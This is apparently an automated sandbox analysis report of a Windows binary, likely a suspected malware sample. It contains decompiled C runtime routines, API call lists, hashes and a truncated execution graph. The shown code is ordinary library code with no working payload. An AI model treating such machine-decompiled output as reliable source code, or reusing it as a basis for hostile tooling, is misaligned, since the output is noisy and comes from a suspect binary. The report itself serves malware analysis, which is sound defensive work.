                    0x003b3aa9
                    0x00000000
                    0x003b3aa9
                    0x003b3b43
                    0x003b3b46
                    0x003b3b4b
                    0x003b3b4b
                    0x003b3b4d
                    0x003b3b52
                    0x003b3b52
                    0x003b394c
                    0x003b394f
                    0x003b3951
                    0x00000000
                    0x00000000
                    0x003b3957
                    0x003b3959
                    0x003b395c
                    0x003b395f
                    0x003b3964
                    0x003b396c
                    0x003b396e
                    0x003b3970
                    0x003b3972
                    0x003b3972
                    0x003b3977
                    0x003b3977
                    0x003b3978
                    0x003b397b
                    0x003b397b
                    0x003b3981
                    0x00000000
                    0x00000000
                    0x003b398d
                    0x003b398f
                    0x003b3992
                    0x003b3994
                    0x003b3a2e
                    0x003b3a35
                    0x003b3a35
                    0x003b3a3b
                    0x003b3a47
                    0x003b3a49
                    0x00000000
                    0x00000000
                    0x003b3a4b
                    0x003b3a51
                    0x003b3a54
                    0x003b3a57
                    0x003b3a5b
                    0x003b3a61
                    0x003b3a64
                    0x003b3a67
                    0x003b3a6a
                    0x003b3a6a
                    0x003b3a6f
                    0x003b3a70
                    0x003b3a73
                    0x00000000
                    0x003b3a73
                    0x003b399a
                    0x003b39a0
                    0x00000000
                    0x003b39a0
                    0x003b39a3
                    0x003b39a5
                    0x003b39aa
                    0x003b39ab
                    0x003b39ae
                    0x003b39b1
                    0x003b39b1
                    0x003b39b3
                    0x00000000
                    0x00000000
                    0x003b39b9
                    0x003b39bb
                    0x003b39be
                    0x003b3a1b
                    0x003b3a1b
                    0x003b3a1c
                    0x003b3a22
                    0x003b3a23
                    0x003b3a26
                    0x003b3a29
                    0x00000000
                    0x003b3a29
                    0x003b39c0
                    0x003b39c2
                    0x00000000
                    0x00000000
                    0x003b39c4
                    0x003b39c6
                    0x003b39c8
                    0x00000000
                    0x00000000
                    0x003b39ca
                    0x003b39cc
                    0x003b39dc
                    0x003b39e9
                    0x003b39f0
                    0x003b39f5
                    0x003b39fc
                    0x003b3a06
                    0x003b3a0a
                    0x003b3a0f
                    0x003b3a12
                    0x003b3a12
                    0x003b3a12
                    0x003b3a15
                    0x003b3a18
                    0x003b3a18
                    0x00000000
                    0x003b3a18
                    0x003b39cf
                    0x003b39d5
                    0x003b39d8
                    0x003b39da
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b39da
                    0x00000000
                    0x003b39b1
                    0x003b38ea
                    0x00000000

                    APIs
                    • __lock.LIBCMT ref: 003B38B6
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __calloc_crt.LIBCMT ref: 003B38C7
                      • Part of subcall function 003B4869: __calloc_impl.LIBCMT ref: 003B4878
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003B38E2
                    • GetStartupInfoW.KERNEL32(?,003C2260,00000064,003B1654,003C2190,00000014), ref: 003B393B
                    • __calloc_crt.LIBCMT ref: 003B3986
                    • GetFileType.KERNEL32(00000001), ref: 003B39CF
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2772871689-0
                    • Opcode ID: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction ID: 3f432dc743191298f6bc49eb10788041ca3d1bf5f50f8f544279b781cd6c1c76
                    • Opcode Fuzzy Hash: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction Fuzzy Hash: 49810671D043658FCB12CF68C8406E9BBF4AF05328F24426DD6A6EBBD1D7349A02CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B3815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E003B3815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E003B1890(_t3);
				if(E003B4560() != 0) {
					_t6 = E003B4001(E003B35A6);
					 *0x3c350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E003B4869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E003B388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E003B405D( *0x3c350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E003B3762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E003B388B();
					return 0;
				}
			}








                    0x003b3815
                    0x003b3821
                    0x003b3830
                    0x003b3835
                    0x003b383b
                    0x003b383e
                    0x00000000
                    0x003b3840
                    0x003b384d
                    0x003b3851
                    0x003b3853
                    0x003b3882
                    0x003b3882
                    0x003b3887
                    0x003b388a
                    0x003b3855
                    0x003b3863
                    0x003b3865
                    0x00000000
                    0x003b3867
                    0x003b3867
                    0x003b3869
                    0x003b386a
                    0x003b3871
                    0x003b3877
                    0x003b387b
                    0x003b387f
                    0x003b3881
                    0x003b3881
                    0x003b3865
                    0x003b3853
                    0x003b3823
                    0x003b3823
                    0x003b3823
                    0x003b382a
                    0x003b382a

                    APIs
                    • __init_pointers.LIBCMT ref: 003B3815
                      • Part of subcall function 003B1890: RtlEncodePointer.NTDLL(00000000,?,003B381A,003B163A,003C2190,00000014), ref: 003B1893
                      • Part of subcall function 003B1890: __initp_misc_winsig.LIBCMT ref: 003B18AE
                      • Part of subcall function 003B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003B4117
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003B412B
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003B413E
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003B4151
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003B4164
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003B4177
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003B418A
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003B419D
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003B41B0
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003B41C3
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003B41D6
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003B41E9
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003B41FC
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003B420F
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003B4222
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003B4235
                    • __mtinitlocks.LIBCMT ref: 003B381A
                    • __mtterm.LIBCMT ref: 003B3823
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B447A
                      • Part of subcall function 003B388B: _free.LIBCMT ref: 003B4481
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(XK<,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B44A3
                    • __calloc_crt.LIBCMT ref: 003B3848
                    • __initptd.LIBCMT ref: 003B386A
                    • GetCurrentThreadId.KERNEL32 ref: 003B3871
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 3567560977-0
                    • Opcode ID: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction ID: 1d4322243ea08b2953d89089327b051f506d4e11de0ef82a23df88f6346f6a65
                    • Opcode Fuzzy Hash: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction Fuzzy Hash: B9F0623250962159E23B76797C026DA2684CF0277CF21862EF750DC8D2EF219A414695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B91C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E003B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E003B4BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E003B917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E003B1CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                    0x003b91ce
                    0x003b91d3
                    0x003b91ed
                    0x00000000
                    0x003b91ed
                    0x003b91d5
                    0x003b91da
                    0x00000000
                    0x00000000
                    0x003b91df
                    0x003b91fc
                    0x003b9201
                    0x003b9204
                    0x003b920b
                    0x003b922a
                    0x003b9231
                    0x003b9233
                    0x003b9277
                    0x003b9283
                    0x003b9286
                    0x003b928b
                    0x003b928e
                    0x003b9294
                    0x003b9296
                    0x003b92a6
                    0x003b92a6
                    0x003b92aa
                    0x003b92ac
                    0x003b92af
                    0x003b92af
                    0x003b92af
                    0x003b92af
                    0x00000000
                    0x003b92b5
                    0x003b9298
                    0x003b9298
                    0x003b929d
                    0x003b929d
                    0x003b92a0
                    0x00000000
                    0x003b92a0
                    0x003b9235
                    0x003b9238
                    0x003b923c
                    0x003b9265
                    0x003b9265
                    0x003b9265
                    0x003b9268
                    0x003b9268
                    0x00000000
                    0x00000000
                    0x003b926a
                    0x003b926e
                    0x00000000
                    0x00000000
                    0x003b9270
                    0x003b9270
                    0x003b9270
                    0x00000000
                    0x003b9270
                    0x003b923e
                    0x003b923e
                    0x003b9241
                    0x00000000
                    0x00000000
                    0x003b9245
                    0x003b924f
                    0x003b9255
                    0x003b9258
                    0x003b925e
                    0x003b9261
                    0x003b9263
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b9263
                    0x003b920d
                    0x003b9210
                    0x003b9212
                    0x003b9217
                    0x003b9217
                    0x003b921c
                    0x00000000
                    0x003b921c
                    0x003b91e1
                    0x003b91e6
                    0x003b91ea
                    0x003b91ea
                    0x00000000

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B91FC
                    • __isleadbyte_l.LIBCMT ref: 003B922A
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 003B9258
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 003B928E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID: 8a;
                    • API String ID: 3058430110-416603896
                    • Opcode ID: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction ID: f90b010a2e6e9fa2754f3460f5b6640f4af5431d2e26d5b14c80d42e11a85a22
                    • Opcode Fuzzy Hash: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction Fuzzy Hash: 6A31C331A0024ABFDB238F69CC44BEA7BA9FF41318F16492AE7158B990D731D850DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B7452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E003B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x3c4834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x3c4830 == _t7) {
									_t9 = E003B1CC3();
									 *_t9 = E003B1CD6(GetLastError());
									goto L17;
								} else {
									if(E003B1741(_t7, _t31) == 0) {
										_t12 = E003B1CC3();
										 *_t12 = E003B1CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E003B1741(_t6, _t31);
						 *((intOrPtr*)(E003B1CC3())) = 0xc;
						goto L12;
					} else {
						E003B4831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E003B114B(__ebx, __edx, __edi, _a8);
				}
			}









                    0x003b7459
                    0x003b7467
                    0x003b746c
                    0x003b747b
                    0x003b74ae
                    0x003b7480
                    0x003b7482
                    0x003b7482
                    0x003b748f
                    0x003b7495
                    0x003b7499
                    0x003b74f9
                    0x003b74f9
                    0x003b749b
                    0x003b74a1
                    0x003b74e3
                    0x003b74f7
                    0x00000000
                    0x003b74a3
                    0x003b74ac
                    0x003b74cb
                    0x003b74df
                    0x003b74c5
                    0x003b74c5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b74ac
                    0x003b74a1
                    0x00000000
                    0x003b74c7
                    0x003b74b4
                    0x003b74bf
                    0x00000000
                    0x003b746e
                    0x003b7471
                    0x003b7477
                    0x003b7477
                    0x003b74c8
                    0x003b74ca
                    0x003b745b
                    0x003b7465
                    0x003b7465

                    APIs
                    • _malloc.LIBCMT ref: 003B745E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: RtlAllocateHeap.NTDLL(00870000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                    • _free.LIBCMT ref: 003B7471
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction ID: d400fa7217a6813c91135100b6f64ce9b3d2cad94987be52578c38d940adbfbc
                    • Opcode Fuzzy Hash: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction Fuzzy Hash: 5511E33280D615ABCB233F76AC55AE93FDCEF4036DF214525FB499EE50DA7089408690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B8BC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E003B8BC0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0x3c24b0);
				_t4 = E003B2400(__ebx, __edi, __esi);
				_t17 =  *0x3c3d3c - 0x3c3d40; // 0x3c3d40
				if(_t17 != 0) {
					E003B442F(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0x3c3d3c = E003B73D6("@=<", 0x3c3d40);
					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E003B8C09();
				}
				return E003B2445(_t4);
			}






                    0x003b8bc0
                    0x003b8bc2
                    0x003b8bc7
                    0x003b8bd1
                    0x003b8bd7
                    0x003b8bdb
                    0x003b8be1
                    0x003b8bf2
                    0x003b8bf7
                    0x003b8bfe
                    0x003b8bfe
                    0x003b8c08

                    APIs
                    • __lock.LIBCMT ref: 003B8BDB
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003B8BEB
                      • Part of subcall function 003B73D6: ___addlocaleref.LIBCMT ref: 003B73F2
                      • Part of subcall function 003B73D6: ___removelocaleref.LIBCMT ref: 003B73FD
                      • Part of subcall function 003B73D6: ___freetlocinfo.LIBCMT ref: 003B7411
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                    • String ID: @=<$@=<
                    • API String ID: 547918592-522152547
                    • Opcode ID: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction ID: a5f234f2f53e71cc729f41302692f6212e64a8ca5f508f7b5c9ebec28bc15cbb
                    • Opcode Fuzzy Hash: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction Fuzzy Hash: EBE08661481300D6D65377617807FCDA6749B0072AF10D10AF2159E9C1CEB45E408B66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003BA94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E003BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E003BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E003BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E003BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E003BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                    0x003ba950
                    0x003ba956
                    0x003ba9c9
                    0x00000000
                    0x003ba95d
                    0x003ba95d
                    0x003ba960
                    0x003ba97b
                    0x003ba97e
                    0x003ba99e
                    0x003ba9b0
                    0x003ba980
                    0x003ba980
                    0x003ba983
                    0x00000000
                    0x003ba985
                    0x003ba997
                    0x003ba997
                    0x003ba983
                    0x003ba9ce
                    0x003ba9d2
                    0x003ba962
                    0x003ba97a
                    0x003ba97a
                    0x003ba960

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 791246b61bd22ebdfa6a228266e53b4722b2487872a4a3b9bbf5b3af0b705a21
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0E013972044A4EBBCF135E84CC418EE3F66BB19358B5A8515FB1958831D736C9B1BB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:3.3%
                    Dynamic/Decrypted Code Coverage:2.7%
                    Signature Coverage:5.7%
                    Total number of Nodes:562
                    Total number of Limit Nodes:71
                    execution_graph 41375 41f100 41378 41b970 41375->41378 41379 41b996 41378->41379 41386 409d40 41379->41386 41381 41b9a2 41382 41b9c3 41381->41382 41394 40c1c0 41381->41394 41384 41b9b5 41430 41a6b0 41384->41430 41433 409c90 41386->41433 41388 409d4d 41389 409d54 41388->41389 41445 409c30 41388->41445 41389->41381 41395 40c1e5 41394->41395 41869 40b1c0 41395->41869 41397 40c23c 41873 40ae40 41397->41873 41399 40c4b3 41399->41384 41400 40c262 41400->41399 41882 4143a0 41400->41882 41402 40c2a7 41402->41399 41885 408a60 41402->41885 41404 40c2eb 41404->41399 41893 41a500 41404->41893 41408 40c341 41409 40c348 41408->41409 41906 41a010 41408->41906 41410 41bdc0 2 API calls 41409->41410 41412 40c355 41410->41412 41412->41384 41414 40c392 41415 41bdc0 2 API calls 41414->41415 41416 40c399 41415->41416 41416->41384 41417 40c3a2 41418 40f4a0 3 API calls 41417->41418 41419 40c416 41418->41419 41419->41409 41420 40c421 41419->41420 41421 41bdc0 2 API calls 41420->41421 41422 40c445 41421->41422 41911 41a060 41422->41911 41425 41a010 2 API calls 41426 40c480 41425->41426 41426->41399 41916 419e20 41426->41916 41429 41a6b0 2 API calls 41429->41399 41431 41a6cf ExitProcess 41430->41431 41432 41af60 LdrLoadDll 41430->41432 41432->41431 41434 409ca3 41433->41434 41486 418bc0 LdrLoadDll 41433->41486 41465 418a70 41434->41465 41437 409cb6 41437->41388 41438 409cac 41438->41437 41468 41b2b0 41438->41468 41440 409cf3 41440->41437 41480 409ab0 41440->41480 41442 409d13 41487 409620 LdrLoadDll 41442->41487 41444 409d25 41444->41388 41446 409c44 41445->41446 41447 41b5a0 LdrLoadDll 41446->41447 41448 409c4a 41447->41448 41449 41b5a0 LdrLoadDll 41448->41449 41450 409c5b 41449->41450 41451 41b5a0 LdrLoadDll 41450->41451 41452 409c71 41451->41452 41453 40f180 41452->41453 41454 40f199 41453->41454 41852 40b040 41454->41852 41456 40f1ac 41856 41a1e0 41456->41856 41460 40f1d2 41461 40f1fd 41460->41461 41862 41a260 41460->41862 41463 41a490 2 API calls 41461->41463 41464 409d65 41463->41464 41464->41381 41488 41a600 41465->41488 41469 41b2c9 41468->41469 41566 409c10 41468->41566 41501 414a50 41469->41501 41472 41b2e1 41473 41b2ea 41472->41473 41540 41b0f0 41472->41540 41473->41440 41475 41b2fe 41475->41473 41558 419f00 41475->41558 41483 409aca 41480->41483 41830 407ea0 41480->41830 41482 409ad1 41482->41442 41483->41482 41843 408160 41483->41843 41486->41434 41487->41444 41491 41af60 41488->41491 41490 418a85 41490->41438 41492 41af70 41491->41492 41494 41af92 41491->41494 41495 414e50 41492->41495 41494->41490 41496 414e5e 41495->41496 41497 414e6a 41495->41497 41496->41497 41500 4152d0 LdrLoadDll 41496->41500 41497->41494 41499 414fbc 41499->41494 41500->41499 41502 414d85 41501->41502 41512 414a64 41501->41512 41502->41472 41505 414b7d 41505->41472 41506 414b90 41573 41a360 41506->41573 41507 414b73 41631 41a460 LdrLoadDll 41507->41631 41510 414bb7 41511 41bdc0 2 API calls 41510->41511 41514 414bc3 41511->41514 41512->41502 41570 419c50 41512->41570 41513 414d49 41516 41a490 2 API calls 41513->41516 41514->41505 41514->41513 41515 414d5f 41514->41515 41520 414c52 41514->41520 41640 414790 LdrLoadDll NtReadFile NtClose 41515->41640 41517 414d50 41516->41517 41517->41472 41519 414d72 41519->41472 41521 414cb9 41520->41521 41523 